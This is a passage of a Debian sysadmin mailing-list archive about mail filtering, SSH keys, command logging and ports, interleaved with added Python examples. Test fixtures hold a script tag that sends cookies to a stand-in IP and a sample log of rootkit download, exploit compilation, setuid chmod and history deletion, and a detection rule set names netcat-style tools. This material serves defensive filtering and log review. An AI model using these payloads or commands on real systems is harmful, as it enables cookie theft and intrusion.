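             "read_bytes", "write_bytes", "cancelled_write_bytes")


def parse_io(text):
    """Parse the text of /proc/<pid>/io ("read_bytes: 4096" lines) into ints."""
    out = {}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        if sep and key in IO_FIELDS and val.strip().isdigit():
            out[key] = int(val)
    return out


def snapshot():
    """{pid: (comm, io_counters)} for every process we are allowed to read."""
    snap = {}
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/io") as f:
                io = parse_io(f.read())
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:     # process exited, or not ours and we lack ptrace access
            continue
        snap[pid] = (comm, io)
    return snap


def rank(before, after, fields=("read_bytes", "write_bytes"), top=10):
    """Processes present in both snapshots, sorted by bytes moved to/from the
    block layer in between. rchar/wchar also count page-cache hits, so the
    default fields are the ones that actually make the discs rattle."""
    rows = []
    for pid, (comm, now) in after.items():
        prev = before.get(pid)
        if prev is None:
            continue                     # started during the interval
        deltas = {k: now.get(k, 0) - prev[1].get(k, 0) for k in fields}
        total = sum(deltas.values())
        if total > 0:
            rows.append((total, pid, comm, deltas))
    rows.sort(reverse=True)
    return rows[:top]


def iotop(interval=2.0, top=10):
    """Sample twice `interval` seconds apart and return the top consumers."""
    before = snapshot()
    time.sleep(interval)
    return rank(before, snapshot(), top=top)


if __name__ == "__main__":
    for total, pid, comm, d in iotop():
        print(f"{total:>12} B  pid {pid:>6} {comm:<16} "
              f"read {d['read_bytes']:>10}  write {d['write_bytes']:>10}")
```

`sar -d` tells you the discs are busy; this tells you who. A process that shows up with a large write delta but nothing in `rchar`/`wchar` is usually a flush of dirty pages on someone else's behalf (kjournald, pdflush), so look one line further down before blaming it.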
apt-get bcm5700-module-2.4.18

2003-11-20 Thread Dan MacNeil

Two questions:

1) Has anyone done a:

apt-get install bcm5700-module-2.4.18

...with a stock 2.4.18 kernel, or otherwise used this driver outside
the package system?

I would very much like to avoid custom-compiling kernels so I can fix any
future kernel security holes with apt-get update/upgrade -s/upgrade.

2) Has anyone gotten different apt-cache search results using the same
sources.list on different machines?

On machine (A) the broadcom package above shows up; on machine (B) it
does not.

sources.list below:

# See sources.list(5) for more information
deb http://debian.lcs.mit.edu/debian woody main contrib non-free
deb http://http.us.debian.org/debian woody main
deb http://security.debian.org/ woody/updates main contrib non-free
deb http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free
# deb http://tiefighter.et.tudelft.nl/~arthur/cvsd ./

# deb-src http://http.us.debian.org/debian testing main contrib non-free
deb-src http://debian.lcs.mit.edu/debian woody main contrib non-free
deb-src http://http.us.debian.org/debian woody main contrib non-free
deb-src http://security.debian.org/ woody/updates main contrib non-free
deb-src http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free

Re: Multiple Server routet to one location

2003-12-14 Thread Dan MacNeil

All this assumes that you need to ration your dialup time. If not, use
something like freesco.org to make the connection on demand and use
regular smtp/ftp/http etc. to allow people remote access to your Strasbourg
server(s).

> ...and if I collect the Mail in Strasbourg, how can I send it effectively
> to Problem-POP's ?

uucp is the program/protocol designed to deliver mail over intermittent
connections.

I believe that from the mid 80s to the mid 90s, a lot of US email traveled
over uucp over intermittent dialup lines instead of over smtp over
dedicated connections.

A quick:

 apt-cache search uucp

I did some quick googling...

Below is a link to a Sendmail/uucp doc:

http://www.fifi.org/doc/HOWTO/en-html/mini/Sendmail+UUCP.html

I know you are running courier as your smtp server, but it might help get
some general principles established. Getting this to and from port 25 or
/var/spool/mail might be the same.

As to allowing the remote sites to publish web pages, from experience in
rural southeast USA 11 years ago, I'd guess that most people on the short
end of an intermittent dial-up connection are most interested in email. Once
that is working smoothly, I'd worry about other stuff.

The minority that need/want to publish web pages on the full time
Internet might get by with emailing them to the hub for a little
while.

Hope this helps.



On Sun, 14 Dec 2003, Michelle Konzack wrote:

> Hello,
>
> I have a small problem with the planning of my CyberCenter:
>
> In Strasbourg I have a Virtual-Webserver with the 'www' Host and the
> 'strasbourg' Host. The internet connectivity is quite good...
>
> This Server is in the same time the Router/Firewall and has 3 NIC's.
> (external interface, admin-net and public-net with all the Workstations)
>
> Internal I have a nfs-Server where my Clients have a little Diskspace
> (50 MByte) for Web (~/public_html) and Mail (~/Maildir). The Server is
> running courier-(imap,mta) and apache.
>
> Then I have in different towns/countries POP's (other CyberCenters)
> which have their own nfs-Servers.
>
> So I have following public:
>
> www.ccenter.org         Main Web-Server
> strasbourg.ccenter.org  nfs/apache/courier-Server where clients have:
>                         E-Mail: [EMAIL PROTECTED]
>                         Web:    strasbourg.ccenter.org/~client/
> utopia.ccenter.org      same as 'strasbourg'
>
> Now the Problem:
>
> The internet connectivity is in some locations only V.90 or ISDN, so
> Web/Mail-Services are not possible permanently.
>
> Solution:
>
> All Web/Mail-Activity is routed via Strasbourg...
>
> OK, I can poll the Problem-POP's through a squid-cache using wget...
>
> But HOW ?
>
> ...and if I collect the Mail in Strasbourg, how can I send it effectively
> to Problem-POP's ?
>
> I was thinking of collecting Mails and putting them onto a shttp-cgi, which
> tars them up after a wget-request (e.g. every 30 minutes). Then on the
> Problem-POP it will be decompressed and all Messages forwarded to procmail...
>
> Any suggestions ?
>
>
> Thanks
> Michelle
>
> P.S.: The Location is Ercec (Turkey) and Khoy (Iran) and there is
>   nothing !

Re: Best Practices: CGI.pm & CSS2 ???

2003-12-31 Thread Dan MacNeil

CSS is not deprecated. It is not reliable for positioning but it is quite
usable for defining text and character styles. If you have ever
changed all the font tags in a web site, you will be a CSS fan.

If you attempt to validate your HTML against w3.org's validator, you
are required to be a fan.

http://validator.w3.org/

It is probably not a good idea to use CGI.pm to produce HTML output. Why
learn another HTML syntax ? Something like HTML::Template or even a HERE
document will serve you better.

However it is very foolish to **Not** use CGI to parse input from a form.
It is much, much easier and safer than parsing the raw query string or
reading STDIN or escaping shell characters or otherwise doing the job by
hand.

#!/usr/bin/perl -wT
use strict;
use CGI;
use CGI::Carp;

my $q    = new CGI;
my $name = $q->param('first_name') || 0;

# never put the raw parameter into the page: escape it first, or the
# script reflects whatever the client sent (script tags included)
my $safe_name = $q->escapeHTML($name);

my $result = <<HERE;
Content-Type: text/html; charset=ISO-8859-1

<html>
<head><title>Hello $safe_name</title></head>
<body>
<h1>Hello $safe_name</h1>
<p>hello $safe_name</p>
</body>
</html>
HERE

if ($name) {
    print $result;
}
else {
    # no name submitted yet: send the form stored after __DATA__ as-is
    print <DATA>;
}

# see perldoc perldata for __DATA__ file handle info
__DATA__
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>simple form</title></head>
<body>
<form method="post" action="">
Name: <input type="text" name="first_name" />
<input type="submit" value="go" />
</form>
</body>
</html>



#

On Tue, 30 Dec 2003, Chris Wagner wrote:

> I can tell you some stuff about that right now.  CGI.pm is just a quick and
> dirty module that will save on some typing in your perl script.  Emphasis on
> some.  If you're doing anything more than basic html tags it quickly becomes
> not worth it anymore.  Writing tag attributes takes up more time and space
> than just writing out the html itself.  The one thing it's really good for
> is writing out tables.  If you have an array with all your row data you can
> write something like print Tr( td([EMAIL PROTECTED]) ).  That saves a lot of typing.
> The perldoc has most of the gritty details.
>
> Cascading Style Sheets.  Deprecated.  I have seen so many bad uses of style
> sheets it makes me want to cry out in anger.  So just don't use them unless
> there's no other way to do it.  They are almost guaranteed to cause
> compatibility problems.  The problem is that some bonehead writes a style
> sheet that makes a webpage look good on *their* computer.  To hell with
> everybody else who doesn't have the same monitor, resolution, fonts,
> browser, etc.  The one thing they are "good" for is making themes but be
> careful that it's still legible on other machines.  I have them turned off
> in my browser.
>
>
> At 10:50 PM 12/29/03 -0600, Michael D Schleif wrote:
> >Please, somebody point me to URL's that provide examples and best
> >practices of using CSS2, CGI.pm and XHTML v1.x.
> >
> >--
> >Best Regards,
>
>
>
>
>
> --
> REMEMBER THE WORLD TRADE CENTER ---=< WTC 911 >=--
> "...ne cede males"
>
> 0100
>
>

replacing sanitizer w/ amavisd-new

2004-01-10 Thread Dan MacNeil

Right now we use sanitizer (stable package) to call a virus scanner and to
strip script, img, style, etc. tags.

We're thinking of switching to amavisd-new (unstable) and clamav (testing)
because while sanitizer strips out the virus, it still passes the junk
message through. We'd like to be able to drop virus-infected messages on
the floor. Another (very minor) consideration is that sanitizer is not a
daemon and pays a speed penalty every time it is launched.

The problem I see looking at the docs is that amavisd-new doesn't strip
out potentially evil html.

The direction we're drifting in is to run sanitizer after amavisd-new. (I
think postfix can run filters in sequence.)


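The HTML stripping the post wants to keep is easy to show concretely. Below is an added example (not sanitizer's code and not from the post) that rewrites the text/html parts of a message with Python's standard-library parser: script and style elements go together with their contents, img and other embedding tags go, on* event handlers and javascript:/vbscript:/data: URLs are removed from the tags that remain, and a header records what was taken out. The tag block list and the sample message are constructed for the example.

```python
"""Strip active content from the text/html parts of a mail message: script
and style elements (with their bodies), img and other embedding tags, on*
event handlers, and javascript:/vbscript:/data: URLs. Standard library only."""
import email
import email.policy
import sys
from html import escape
from html.parser import HTMLParser

# Assumed block list, after the "script, img, style, etc." in the post.
DROP_TAGS = {"script", "style", "img", "iframe", "frame", "frameset", "object",
             "embed", "applet", "link", "meta", "base", "form", "input"}
DROP_BODY_TAGS = {"script", "style"}          # their contents go too
BLOCKED_SCHEMES = ("javascript:", "vbscript:", "data:")


class Defanger(HTMLParser):
    """Re-serialise HTML, leaving out the dangerous parts."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self.skipping = [], [], None

    def _clean_attrs(self, attrs):
        for name, value in attrs:           # HTMLParser lower-cases names
            if name.startswith("on"):       # onload=, onclick=, ...
                self.dropped.append(f"attr:{name}")
                continue
            if value is not None:
                # "java\tscript:" and "JavaScript:" both count as javascript:
                if "".join(value.split()).lower().startswith(BLOCKED_SCHEMES):
                    self.dropped.append(f"url:{name}")
                    continue
            yield name, value

    def _emit_open(self, tag, attrs, self_closing):
        attr_text = "".join(f' {n}="{escape(v or "", quote=True)}"'
                            for n, v in self._clean_attrs(attrs))
        self.out.append(f"<{tag}{attr_text}{' />' if self_closing else '>'}")

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            return
        if tag in DROP_BODY_TAGS:
            self.skipping = tag
        if tag in DROP_TAGS:
            self.dropped.append(f"tag:{tag}")
        else:
            self._emit_open(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        if self.skipping:
            return
        if tag in DROP_TAGS:
            self.dropped.append(f"tag:{tag}")
        else:
            self._emit_open(tag, attrs, True)

    def handle_endtag(self, tag):
        if self.skipping:
            if tag == self.skipping:
                self.skipping = None
        elif tag not in DROP_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        self.dropped.append("comment")      # conditional comments can hide markup


def defang_html(html):
    """Return (cleaned_html, list of what was removed)."""
    p = Defanger()
    p.feed(html)
    p.close()
    return "".join(p.out), p.dropped


def defang_message(raw):
    """Rewrite every text/html part of a raw message; returns (bytes, removed)."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    removed = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            cleaned, dropped = defang_html(part.get_content())
            removed.extend(dropped)
            part.set_content(cleaned, subtype="html")
    if removed:
        msg["X-Defanged"] = ", ".join(sorted(set(removed)))
    return msg.as_bytes(), removed


def html_parts(raw):
    """Decoded text of each text/html part (handy for checking the result)."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    return [p.get_content() for p in msg.walk()
            if p.get_content_type() == "text/html"]


# Constructed sample, not a captured message.
SAMPLE = b"""From: [email protected]
To: [email protected]
Subject: test
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body onload="evil()"><p>Hello &amp; welcome</p>
<script>new Image().src='http://198.51.100.7/?'+document.cookie</script>
<img src="http://198.51.100.7/beacon.gif" />
<a href="jAvAsCrIpT:alert(1)">click</a> <a href="http://example.com/">ok</a>
</body></html>
"""

if __name__ == "__main__":              # filter mode: message in, message out
    sys.stdout.buffer.write(defang_message(sys.stdin.buffer.read())[0])
```

It fits the same slot as sanitizer in a postfix content_filter pipeline: message on stdin, rewritten message on stdout. The caveat a practitioner would add: a block list like this one is only as good as its last entry, and an allow-list of tags and attributes is the safer design when the mail will be rendered by browsers you do not control; this version keeps the block list because that is what the post describes.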
Re: replacing sanitizer w/ amavisd-new

2004-01-10 Thread Dan MacNeil

Thanks for your reply.

> Might I suggest MailScanner?

You might; some specific problems with amavisd-new that aren't present in
MailScanner might be even more helpful.

At:
 http://www.geocities.com/scottlhenderson/spamfilter.html

they say:

# mailscanner system, works with Postfix and other MTAs. This
uses unsupported methods to manipulate Postfix queue files, and there are
multiple reports of message duplication and/or delivery of truncated
messages.

#

On Sat, 10 Jan 2004, Michael Loftis wrote:

> Might I suggest MailScanner?  For me it's been MUCH more reliable and
> flexible.  In fact I'm gearing up to replace amavisd-new with MailScanner
> at work.  We've run into some bugs with the latest version (4.24
> specifically), but the version I'm using on FreeBSD 4.22.5 is solid, and
> the version in debian stable 3.13.2 should also be very solid.
>
> It works with a slew of AV scanners, and integrating with one it doesn't
> support natively is as simple as editing a few files.  The thing has about
> 1000 some odd settings though so it can be daunting to set up.
>
> --On Saturday, January 10, 2004 15:12 -0500 Dan MacNeil
> <[EMAIL PROTECTED]> wrote:
>
>
> --
> Michael Loftis
> Modwest Sr. Systems Administrator
> Powerful, Affordable Web Hosting
>

Re: replacing sanitizer w/ amavisd-new

2004-01-10 Thread Dan MacNeil


Thanks for your discussion.

One correction, the muttering about "unsupported methods" is actually
from:

http://www.postfix.org/addon.html#content

which is perhaps slightly more credible than geocities.

Googling around a bit I got this thread with thoughts from one of
the main developers (Wietse Venema)

http://archives.neohapsis.com/archives/postfix/2003-08/0511.html
http://archives.neohapsis.com/archives/postfix/2003-08/0513.html
http://archives.neohapsis.com/archives/postfix/2003-08/0514.html
http://archives.neohapsis.com/archives/postfix/2003-08/0515.html
http://archives.neohapsis.com/archives/postfix/2003-08/0522.html
http://archives.neohapsis.com/archives/postfix/2003-08/0595.html

[the threading at the archive was not good so I included links to whole
thread]

I might feel differently if our server was heavily burdened, but the
prospect of breaking things with an upgrade to postfix is not worth the
speed.

On Sat, 10 Jan 2004, Michael Loftis wrote:

>
>
> --On Saturday, January 10, 2004 21:53 -0500 Dan MacNeil
> <[EMAIL PROTECTED]> wrote:
>
> >
> > Thanks for your reply.
> >
> >> Might I suggest MailScanner?
> >
> > You might, some specific problems with amavisd-new that aren't present in
> > MailScanner  might be even more helpful.
> >
> > At:
> >  http://www.geocities.com/scottlhenderson/spamfilter.html
> >
> > they say:
> >
> ># mailscanner system, works with Postfix and other MTAs. This
> > uses unsupported methods to manipulate Postfix queue files, and there are
> > multiple reports of message duplication and/or delivery of truncated
> > messages.
>
> It isn't exactly supported nor unsupported. Basically it relies on the
> fact that postfix can be told to use deferred transports on inbound,
> automatically forcing everything to go into the deferred queue.  You run
> one copy of postfix in that mode.  Another in a normal mode, minus
> smtp/incoming mail.  I haven't had any problems with truncated email nor
> duplicate deliveries at all with recent-ish Postfix.  MailScanner monitors
> the deferred queue, pulling messages out of there and working on them,
> putting them into the inbound pickup area on the other postfix instance
> after processing.  The system works well and is quick.
>
> I don't see how postfix could be responsible for multiple deliveries in
> this scenario, nor how mailscanner would cause it.  The only time that sort
> of thing would happen is for people who don't follow the instructions and
> don't put the three queues (mailscanner, inbound postfix, outbound postfix)
> on the same partition/filesystem.  This is a MUST.  mailscanner simply
> relinks the files into/out of work areas, this is fast, and atomic,
> assuming it's on the same filesystem.  Otherwise if it's not the same
> filesystem you have to copy to/from staging areas to achieve the atomicity.
>
>
> MailScanner catches about 30% more 'dangerous content' and virii than
> amavisd-new given the same virus scanner because MS seems to unpack more
> thoroughly/properly.  MS supports/integrates the update system of all the
> virus scanners it supports negating the need to run a separate update
> cronjob all the time.  MS supports throttles, amavisd does not, and so MS
> will be much nicer to an overloaded/very briskly loaded system than
> amavisd.  amvisd requires copying the message multiple times, MS reduces
> this by using the link/unlink method that all mailservers use nowadays
> internally to their queues.
>
> MS does require running two separate copies of postfix, that amavisd does
> not.  There's a point for amavis.  amavis eliminates unnecessary code from
> the resultant script at ./configure time, MailScanner doesn't.  That said
> though MailScanner seems to work faster on my system.
>
> Not sure how much else to go on about this.
>
> --
> Michael Loftis
> Modwest Sr. Systems Administrator
> Powerful, Affordable Web Hosting

Re: SSH Privat key and login as root without a passwort

2004-01-18 Thread Dan MacNeil

> I am looking to generate a private SSH key. There is a tool that generates
> private RSA keys. Now I have a private key generated, but where must I put
> it in Linux so that Linux knows who I am and I don't need a password for
> login?


You put the **private** key on the system you are connecting FROM (in
your case this looks like PuTTY) and you put the **public** key on the
system you are connecting TO (in your case this looks like
~/.ssh/authorized_keys).

The docs for putty, ssh, ssh-keygen should be helpful:

http://www.tartarus.org/~simon/puttydoc/Contents.html

man ssh-keygen
man sshd # see end for authorized_keys file info

It is worth noting that putty can import/export
openssh keys.

Also you should check that the system administrator has not disallowed use
of public/private keys for ssh authentication. (see /etc/ssh/sshd_config
on the system you are connecting TO)



On Sun, 18 Jan 2004, Fraser Campbell wrote:

> On January 18, 2004 10:45 am, ournewsletter wrote:
>
> > put it in /root/.ssh/authorized_keys. I don't know if it works with the key
> > produced by Putty, but with a "ssh-keygen"-generated public key it does. If
> > you need more public keys to log in, simply name the key
> > files /root/.ssh/authorized_keys2, /root/.ssh/authorized_keys3 ...
>
> Putty keys do work with openssh but you must edit them first.  Putty keys
> look rather like the ascii export of a gpg key, you must edit them so that
> they look like this:
>
> ssh-rsa 89yh23wrnhjfdg... #all one line
>
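The PuTTY-to-OpenSSH edit described in the thread, as an added example (not code from the thread, from PuTTY or from OpenSSH). PuTTYgen's "Save public key" writes the RFC 4716 block format (`---- BEGIN SSH2 PUBLIC KEY ----`, header lines, wrapped base64); authorized_keys wants `keytype base64 comment` on one line, which is what `ssh-keygen -i -f putty.pub` produces. The converter below does the same by hand, takes the key type from the blob itself rather than trusting the file, and prints the SHA256 fingerprint that `ssh-keygen -l` shows. The RSA blob used for the self-check is constructed with an arbitrary modulus and is not a real key.

```python
"""Turn the public key PuTTYgen saves (RFC 4716 "---- BEGIN SSH2 PUBLIC KEY ----"
block) into the one-line form that goes into ~/.ssh/authorized_keys, and
compute the SHA256 fingerprint `ssh-keygen -l` reports. Standard library only."""
import base64
import hashlib
import struct

BEGIN = "---- BEGIN SSH2 PUBLIC KEY ----"
END = "---- END SSH2 PUBLIC KEY ----"


def _ssh_string(b):
    """RFC 4251 string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def _mpint(x):
    # RFC 4251 mpint: big-endian two's complement; the extra byte gives a
    # leading 0x00 when the high bit is set, so the number stays positive.
    return _ssh_string(x.to_bytes((x.bit_length() + 8) // 8, "big"))


def _read_string(blob, off):
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def rfc4716_to_openssh(text, default_comment="imported"):
    """Return 'keytype base64 comment', i.e. one authorized_keys line."""
    lines = text.strip().splitlines()
    if lines[0] != BEGIN or lines[-1] != END:
        raise ValueError("not an RFC 4716 public key block")
    i, comment = 1, None
    while i < len(lines) - 1 and ":" in lines[i]:       # header lines
        name, value = lines[i].split(":", 1)
        value = value.strip()
        while value.endswith("\\"):                       # continuation line
            i += 1
            value = value[:-1] + lines[i].strip()
        if name.strip().lower() == "comment":
            comment = value.strip('"')
        i += 1
    blob = base64.b64decode("".join(lines[i:-1]), validate=True)
    keytype, _ = _read_string(blob, 0)
    keytype = keytype.decode("ascii")
    if keytype not in ("ssh-rsa", "ssh-dss", "ssh-ed25519") \
            and not keytype.startswith("ecdsa-sha2-"):
        raise ValueError(f"unexpected key type {keytype!r}")
    return f"{keytype} {base64.b64encode(blob).decode('ascii')} {comment or default_comment}"


def rsa_bits(blob):
    """Modulus size of an ssh-rsa blob, the number ssh-keygen -l prints first."""
    keytype, off = _read_string(blob, 0)
    if keytype != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key")
    _e, off = _read_string(blob, off)
    n, _ = _read_string(blob, off)
    return int.from_bytes(n, "big").bit_length()


def fingerprint(blob):
    """OpenSSH-style 'SHA256:...' fingerprint (base64 without '=' padding)."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def make_rfc4716(blob, comment):
    """Render a blob the way PuTTYgen's 'Save public key' does."""
    b64 = base64.b64encode(blob).decode("ascii")
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f'{BEGIN}\nComment: "{comment}"\n{body}\n{END}\n'


def constructed_rsa_blob():
    # Constructed, NOT a real key: e=65537 and an arbitrary 2048-bit odd number
    # as modulus. Enough to exercise the wire format; useless for crypto.
    n = (1 << 2047) | 0x1234567 | 1
    return _ssh_string(b"ssh-rsa") + _mpint(65537) + _mpint(n)


if __name__ == "__main__":
    blob = constructed_rsa_blob()
    print(rfc4716_to_openssh(make_rfc4716(blob, "alice@laptop")))
    print(rsa_bits(blob), fingerprint(blob))
```

After appending the line, remember the checks sshd makes under StrictModes (the default): ~/.ssh must not be group- or world-writable and authorized_keys should be mode 0600, otherwise the key is ignored without any message to the client, which looks exactly like "my key doesn't work".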

Re: apt-get and mounting /tmp with noexec option

2004-01-18 Thread Dan MacNeil

How about running apache chroot'd so what apache thinks is  /tmp and
what apt-get thinks is /tmp are two different things?

fstab would look something like: (untested)

# <device>  <mount point>  <type>  <options>                     <dump> <pass>
# (filesystem type assumed to be ext3; use whatever sdc1 actually carries)
/dev/sdc1   /var/www/tmp   ext3    defaults,noexec,nosuid,nodev   0      2

shell access exploits (was Re: upgrading to MySQL 4 on woody)

2004-01-19 Thread Dan MacNeil

> I have at most a week from a known kernel exploit to when one of my users
> tries to exploit via shell access.

One of my hats is a junior sys admin in an academic environment. I'm
curious as to how you know when shell users are trying to exploit a kernel
hole.

In another non-academic environment and based on info from this list, I've
been running snoopy with an eye to grepping the logs for naughtiness.


#

On Mon, 19 Jan 2004, Lucas Albers wrote:

>
> Rod Rodolico said:
>
> > Becoming a firm believer that you CAN have it all, stability and the
> > latest packages :)
> >
> > There are other places to get backports, BTW. This one works for me.
> >
> Rod,
> Yes I agree with your statements.
> Thanks for the link I'll use it on one of my systems...
>
> But you don't explicitly have security, you have the testing delay for
> security updates, combined with the propagation time to backports from
> testing.
>
> I'm still leery of using testing for any publicly exposed service, or for
> machines with shell access.
> I have at most a week from a known kernel exploit to when one of my users
> tries to exploit via shell access.
>
> --Luke CS Sysadmin, Montana State University-Bozeman
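Both the "command logging" post above and this one come down to the same chore: a daily pass through snoopy's output for things like `tar -xzf rootkit.tar.gz`. The script below is an added example (not from either post and not part of snoopy) that does that pass with a small, constructed rule set. The line format it parses is the classic snoopy syslog line, `[uid:... sid:... tty:... cwd:... filename:...]: command`, which is an assumption about the snoopy version in use, and the sample log lines are made up.

```python
"""Daily review of snoopy-style command logs. Each syslog line is parsed and
the command checked against a small rule set, so "tar -xzf rootkit.tar.gz"
and friends float to the top. Format assumed (snoopy 1.x):
  <ts> <host> snoopy[<pid>]: [uid:N sid:N tty:T cwd:D filename:F]: <command>"""
import re
from collections import Counter

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+(?P<host>\S+)\s+"
    r"snoopy\[(?P<pid>\d+)\]:\s+\[(?P<fields>[^\]]*)\]:\s+(?P<cmd>.*)$")
FIELD_RE = re.compile(r"(\w+):(\S*)")

# Constructed rule set: tune to what is normal on your box.
RULES = {
    "download":        re.compile(r"\b(wget|curl|fetch|lynx|ftp|tftp)\b"),
    "unpack-archive":  re.compile(r"\btar\b[^|;]*\bx|\b(unzip|gunzip|bunzip2)\b"),
    "compiler":        re.compile(r"\b(gcc|cc|make)\b|g\+\+"),
    "setuid-chmod":    re.compile(r"\bchmod\s+(\S*[ugo]*\+s|[2-7]\d{3})\b"),
    "net-tool":        re.compile(r"\b(nc|netcat|ncat|nmap|socat)\b|ssh\s.*-R\s"),
    "hidden-tmp-path": re.compile(r"(^|[\s=])/(tmp|var/tmp|dev/shm)/\.\S*"),
    "kernel-recon":    re.compile(r"\buname\s+-\w*[ar]|/proc/version|/etc/(issue|debian_version)"),
    "su-or-sudo":      re.compile(r"\b(su|sudo)\b"),        # noisy where sudo is routine
    "history-tamper":  re.compile(r"\.bash_history|HISTFILE|\bhistory\s+-c"),
}
TMP_CWD_RE = re.compile(r"^/(tmp|var/tmp|dev/shm)(/|$)")


def parse_line(line):
    """Dict with ts/host/pid/cmd plus the bracketed fields, or None if not snoopy."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec.update(FIELD_RE.findall(rec.pop("fields")))
    return rec


def flag(rec):
    """Names of the rules the record trips (empty list for a quiet line)."""
    hits = [name for name, rx in RULES.items() if rx.search(rec["cmd"])]
    if TMP_CWD_RE.match(rec.get("cwd", "")):
        hits.append("cwd-in-tmp")        # working out of /tmp is itself a tell
    return hits


def review(lines):
    """(findings, commands_per_uid). findings are (uid, ts, cmd, hits) tuples."""
    findings, per_uid = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        uid = rec.get("uid", "?")
        per_uid[uid] += 1
        hits = flag(rec)
        if hits:
            findings.append((uid, rec["ts"], rec["cmd"], hits))
    return findings, per_uid


def report(findings, per_uid):
    """Plain-text daily report: activity summary, then one line per finding."""
    head = "commands per uid: " + ", ".join(
        f"{u}={n}" for u, n in sorted(per_uid.items()))
    body = [f"{ts}  uid={uid:<6} [{','.join(hits)}]  {cmd}"
            for uid, ts, cmd, hits in findings]
    return "\n".join([head, *body])


# Constructed sample log; 198.51.100.7 is a documentation address.
SAMPLE_LOG = """\
Oct 28 09:12:01 shellbox snoopy[4011]: [uid:1001 sid:3990 tty:/dev/pts/2 cwd:/home/alice filename:/bin/ls]: ls -la
Oct 28 09:12:33 shellbox snoopy[4012]: [uid:1001 sid:3990 tty:/dev/pts/2 cwd:/home/alice filename:/usr/bin/vim]: vim report.txt
Oct 28 23:41:07 shellbox snoopy[5120]: [uid:1002 sid:5100 tty:/dev/pts/4 cwd:/tmp/.x filename:/usr/bin/wget]: wget http://198.51.100.7/rk.tgz
Oct 28 23:41:19 shellbox snoopy[5121]: [uid:1002 sid:5100 tty:/dev/pts/4 cwd:/tmp/.x filename:/bin/tar]: tar -xzf rootkit.tar.gz
Oct 28 23:42:02 shellbox snoopy[5122]: [uid:1002 sid:5100 tty:/dev/pts/4 cwd:/tmp/.x/rk filename:/usr/bin/gcc]: gcc -o x exploit.c
Oct 28 23:42:40 shellbox snoopy[5123]: [uid:1002 sid:5100 tty:/dev/pts/4 cwd:/tmp/.x/rk filename:/bin/chmod]: chmod 4755 x
Oct 28 23:43:00 shellbox snoopy[5124]: [uid:1002 sid:5100 tty:/dev/pts/4 cwd:/tmp/.x/rk filename:/bin/rm]: rm -f /home/bob/.bash_history
"""

if __name__ == "__main__":
    import sys
    lines = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG.splitlines()
    print(report(*review(lines)))
```

Feed it the day's syslog extract on stdin (wherever your syslog.conf sends snoopy's lines) and read the findings together with the per-uid counts: a user who ran three hundred commands at 03:00 is worth a look even when none of them trips a rule. One caveat that applies to snoopy itself: it is an LD_PRELOAD hook, so a user who statically links or unsets LD_PRELOAD leaves no lines, and a missing entry is not evidence of quiet.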

changing max privledged port from 1024

2004-02-02 Thread Dan MacNeil

How do you allow non root users to bind to ports below 1024 ?

Alternatively, what iptables / tcpwrappers / xinetd / stunnel / magic
thing should I be looking at to forward port 995 to port 5432 ?

Our bandwidth provider (a university telecom dept) is filtering port 5432,
the postgres port. On the political front things are proceeding
slowly.

We'd like to bind postgres to port 995 (/etc/services says: pop3
over SSL) as this port is unlikely to be closed and we're not
running pop3 over SSL on the database machine.

Postgresql does not run as root and hence cannot bind to port 995.

A morning of google and man sysctl have given teases but no answers.

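As an added example for the forwarding question above (not code from the post): a small TCP relay that listens on one port and hands each connection to another host:port. Run as root it can listen on 995 and forward to 127.0.0.1:5432, which is the assumed layout; the loopback self-test at the bottom stands in for postgres with an echo server so the relay can be exercised without either.

```python
"""Relay TCP connections arriving on one port to another host:port, so a
service that cannot bind a privileged port (postgres, wanted on 995 here)
can still be reached there. Standard library only."""
import asyncio
import sys


async def _pump(reader, writer):
    """Copy bytes from reader to writer until EOF, then close the writer."""
    try:
        while True:
            chunk = await reader.read(65536)
            if not chunk:
                break
            writer.write(chunk)
            await writer.drain()
    finally:
        writer.close()


async def _handle(client_r, client_w, target_host, target_port):
    try:
        server_r, server_w = await asyncio.open_connection(target_host, target_port)
    except OSError:                     # backend down: drop the client
        client_w.close()
        return
    await asyncio.gather(_pump(client_r, server_w), _pump(server_r, client_w))


async def start_relay(listen_host, listen_port, target_host, target_port):
    """Start listening; returns the asyncio.Server (close() stops it)."""
    return await asyncio.start_server(
        lambda r, w: _handle(r, w, target_host, target_port),
        listen_host, listen_port)


def bound_port(server):
    """Port a server ended up on (useful after asking for port 0)."""
    return server.sockets[0].getsockname()[1]


# Loopback self-check: client -> relay -> echo server, all on 127.0.0.1.
async def _echo(reader, writer):
    writer.write(await reader.read(65536))
    await writer.drain()
    writer.close()


async def _roundtrip(payload):
    echo = await asyncio.start_server(_echo, "127.0.0.1", 0)
    relay = await start_relay("127.0.0.1", 0, "127.0.0.1", bound_port(echo))
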